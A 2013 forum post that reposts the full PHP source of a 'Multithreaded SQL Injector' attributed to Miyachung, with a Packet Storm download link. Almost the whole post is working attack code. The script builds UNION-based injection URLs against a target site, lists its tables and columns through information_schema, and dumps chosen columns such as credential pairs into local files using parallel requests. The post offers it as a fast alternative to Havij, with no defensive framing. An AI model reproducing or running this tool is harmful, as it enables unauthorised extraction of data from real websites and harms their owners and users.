Raptor87 Posted July 26, 2013 Report Posted July 26, 2013 This is a SQL injection tool similar to havij but is super fast per the author.Authored by:miyachungSystems | unix<?php/************************************************************************* . __ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/--------------------------------------------------------------------------* Multithreaded SQL Injector* Coded by Miyachung* Miyachung@hotmail.com* Special Thanks burtay* Janissaries.Org* Youtube Channel -> http://www.youtube.com/JanissariesOrg* Usage -> https://www.youtube.com/watch?v=pytxxNnDWEU* Dump show -> https://www.youtube.com/watch?v=TvCvtgKn6Rg***************************************************************************/set_time_limit(0);if(!is_dir("dumps")){mkdir("dumps");}echo "[+]Enter website: ";$site = fgets(STDIN);$site = str_replace("\r\n","",$site);$site = trim($site);if(!$site) exit("\n[-]Where is the website!");if(!preg_match('#http#',$site)) $site = "http://".$site;echo "[+]Enter column number: ";$colons = fgets(STDIN);$colons = str_replace("\r\n","",$colons);$colons = trim($colons);if(!$colons) exit("\n[-]Where is the columns!");echo "[+]Enter effected column: ";$effected = fgets(STDIN);$effected = str_replace("\r\n","",$effected);$effected = trim($effected);if(!$effected) exit("\n[-]Where is the effected column!");echo "[+]Advanced SQL Injecter\n";echo "[+]Coded by Miyachung || Janissaries.Org\n";$version_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<v3rsion>"),__hexEncode("</v3rsion>"),"version()");$version_page = fetch($version_url);if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page)){exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");}elseif(preg_match("#403 Forbidden#si",$version_page)){exit("[-]Fail -> 403 Forbidden\n");}$version_page = __replace($version_page);if(preg_match('#<v3rsion>#si',$version_page)){preg_match("/<v3rsion>(.*?)<\/v3rsion>/si",$version_page,$version);echo "[+]Version -> ".strip_tags($version[1])."\n";}else{exit("[-]Version not found\n");}$database_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<d4tabase>"),__hexEncode("</d4tabase>"),"database()");$database_page = fetch($database_url);if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page)){exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");}elseif(preg_match("#403 Forbidden#si",$database_page)){exit("[-]Fail -> 403 Forbidden\n");}$database_page = __replace($database_page);if(preg_match('#<d4tabase>#si',$database_page)){preg_match("/<d4tabase>(.*?)<\/d4tabase>/si",$database_page,$database);echo "[+]Database -> ".strip_tags($database[1])."\n";}else{echo "[-]Database not found\n";}if(substr($version[1],0,1) == 5){echo "[+]Version >= 5 getting tables,using information_schema.tables\n";}else{exit("[-]Version < 5 , sorry can't get the tables");}$table_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode("<t4blecount>"),__hexEncode("</t4blecount>"),"count(table_name)");$table_countpage = fetch($table_counturl);$table_countpage = __replace($table_countpage);preg_match("/<t4blecount>(.*?)<\/t4blecount>/si",$table_countpage,$table_counted);if($table_counted[1] == null){exit("[-]Tables not found\n");}echo "[+]Total tables -> ".$table_counted[1]."\n";for($xz=0;$xz<$table_counted[1];$xz++){$table_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode("<t4bles>"),__hexEncode("</t4bles>"),"table_name");// $table_page = fetch($table_url);// if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$table_page))// {// exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");// }// elseif(preg_match("#403 Forbidden#si",$table_page))// {// exit("[-]Fail -> 403 Forbidden\n");// }// $table_page = __replace($table_page);// preg_match("/<t4bles>(.*?)<\/t4bles>/si",$table_page,$tables);// $tbls[] = strip_tags(trim($tables[1]));}$tbls = __threading($table_url,10,"/<t4bles>(.*?)<\/t4bles>/si",FALSE,FALSE);table_again:echo "\n";$tbls = array_values(array_unique(array_filter($tbls)));if(empty($tbls)){exit("[-]Can't get tables\n");}foreach($tbls as $tid => $tbl){echo "[$tid]$tbl\n";}echo "\n[+]Choose a table for get columns,just type number (exit): ";$choose = fgets(STDIN);$choose = str_replace("\r\n","",$choose);$choose = trim($choose);if($choose == "exit"){exit("\n");}$selected = $tbls[$choose];$column_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,"",__hexEncode("<c0lumnscount>"),__hexEncode("</c0lumnscount>"),"count(column_name)");$column_countpage = fetch($column_counturl);$column_countpage = __replace($column_countpage);preg_match("/<c0lumnscount>(.*?)<\/c0lumnscount>/si",$column_countpage,$column_counted);if($column_counted[1] == null || $column_counted[1] == 0){echo "[-]Columns not found\n";goto table_again;}echo "[+]Total columns for $selected -> ".$column_counted[1]."\n";for($xc=0;$xc<$column_counted[1];$xc++){$column_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,$xc,__hexEncode("<c0lumns>"),__hexEncode("</c0lumns>"),"column_name");// $column_page = fetch($column_url);// if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$column_page))// {// exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");// }// elseif(preg_match("#403 Forbidden#si",$column_page))// {// exit("[-]Fail -> 403 Forbidden\n");// }// $column_page = __replace($column_page);// preg_match("/<c0lumns>(.*?)<\/c0lumns>/si",$column_page,$columns);// $cols[] = strip_tags(trim($columns[1]));}$cols = __threading($column_url,5,"/<c0lumns>(.*?)<\/c0lumns>/si",FALSE,FALSE);col_showagain:echo "\n";$cols = array_values(array_unique(array_filter($cols))); foreach($cols as $cid => $colname) { echo "[$cid]$colname\n"; }what_again:echo "\n[+]What do you wanna do (dump,back,exit): ";$whatdo = fgets(STDIN);$whatdo = str_replace("\r\n","",$whatdo);$whatdo = trim($whatdo);if($whatdo == "dump"){col_ask:echo "[+]Select dump column 1,just type number(back,exit): ";$select_col1 = fgets(STDIN);$select_col1 = str_replace("\r\n","",$select_col1);$select_col1 = trim($select_col1);if($select_col1 == "back"){goto col_showagain;}elseif($select_col1 == "exit"){exit("\n");}echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): ";$select_col2 = fgets(STDIN);$select_col2 = str_replace("\r\n","",$select_col2);$select_col2 = trim($select_col2);if($select_col2 == "back"){goto col_ask;}elseif($select_col2 == "exit"){exit("\n");}elseif(!empty($select_col2)){$column2 = $cols[$select_col2];}$column1 = $cols[$select_col1];$count_url = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,"",__hexEncode("<miyacount>"),__hexEncode("</miyacount>"),"count($column1)");$count_page = fetch($count_url);$count_page = __replace($count_page);preg_match("/<miyacount>(.*?)<\/miyacount>/si",$count_page,$datacount);if(trim($datacount[1]) == null || $datacount[1] == 0){echo "[-]Columns empty\n";goto col_showagain;}echo "[+]Total datas -> ".$datacount[1]."\n";echo "[+]Using LIMIT NULL,1 for dump\n\n";for($x=0;$x<=$datacount[1];$x++){if($column2){$dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1,0x3a,$column2");$filename = "dumps/".__parse($site).",$column1"."_"."$column2.txt";}else{$dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1");$filename = "dumps/".__parse($site).",$column1.txt";}// $dump_page = fetch($dump_url);// if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$dump_page))// {// exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");// }// elseif(preg_match("#403 Forbidden#si",$dump_page))// {// exit("[-]Fail -> 403 Forbidden\n");// }// $dump_page = __replace($dump_page);// if(preg_match("/<dumped>(.*?)<\/dumped>/si",$dump_page,$dumps))// {// $dump = $dumps[1];// echo strip_tags(trim("[$x]$dump"))."\n";// ob_flush();flush();// __dumpsave($filename,$dump."\r\n");// }}if($datacount[1] >= 20){$dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,TRUE,$filename);}else{$dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,FALSE,"");}unset($column_url);unset($dump_url);goto col_showagain;}elseif($whatdo == "back"){unset($column_url);unset($cols);goto table_again;}elseif($whatdo == "exit"){exit("\n");}else{echo "[-]Unknown command\n";goto what_again;}function fetch($url){$curl = curl_init();curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl,CURLOPT_URL,$url);curl_setopt($curl,CURLOPT_TIMEOUT,10);$oba = curl_exec($curl);return $oba;}function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2,$what){$colon_union = range(1,$colons);if($concat){$colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)";}else{$colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)";}$colon_union = implode(",",$colon_union);if($from){if($limit != null){$url = $site."+and+1=0+union+select+".$colon_union.$from."+limit+$limit,1--";}else{$url = $site."+and+1=0+union+select+".$colon_union.$from."--";}}else{if($limit != null){$url = $site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--";}$url = $site."+and+1=0+union+select+".$colon_union."--";}return $url;}function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL){$init = curl_multi_init();$urls = array_chunk($urls,$thread);$x = 0;foreach($urls as $url){ for($i=0;$i<=count($url)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,$url[$i]); curl_setopt($curl[$i],CURLOPT_TIMEOUT,10); curl_multi_add_handle($init,$curl[$i]); } do{curl_multi_exec($init,$active);usleep(11);}while($active>0); foreach($curl as $cid => $page) { $content[$cid] = curl_multi_getcontent($page); curl_multi_remove_handle($init,$page); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid])) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$content[$cid])) { exit("[-]Fail -> 403 Forbidden\n"); } preg_match($regex,$content[$cid],$veri); if($yaz == TRUE) { if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1])) { $x++; echo "[$x]$veri[1]\n"; ob_flush();flush(); if($kaydet == TRUE && $file != NULL) { $fopen = fopen($file,'ab'); fwrite($fopen,trim($veri[1])."\r\n"); fclose($fopen); } } } else { $veriler[] = $veri[1]; } }}return $veriler;}function __hexEncode($string){ $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex;}function __replace($text){$text = str_replace("<","<",$text);$text = str_replace(">",">",$text);return $text;}function __dumpsave($file,$text){$fp = fopen($file,'ab');fwrite($fp,$text);fclose($fp);return true;}function __parse($site){$site = explode("/",$site);$site = $site[2];return $site;}?>Download:http://packetstormsecurity.com/files/download/121491/sqlinjecter.txtSource:Multithreaded SQL Injector ? Packet Storm Quote
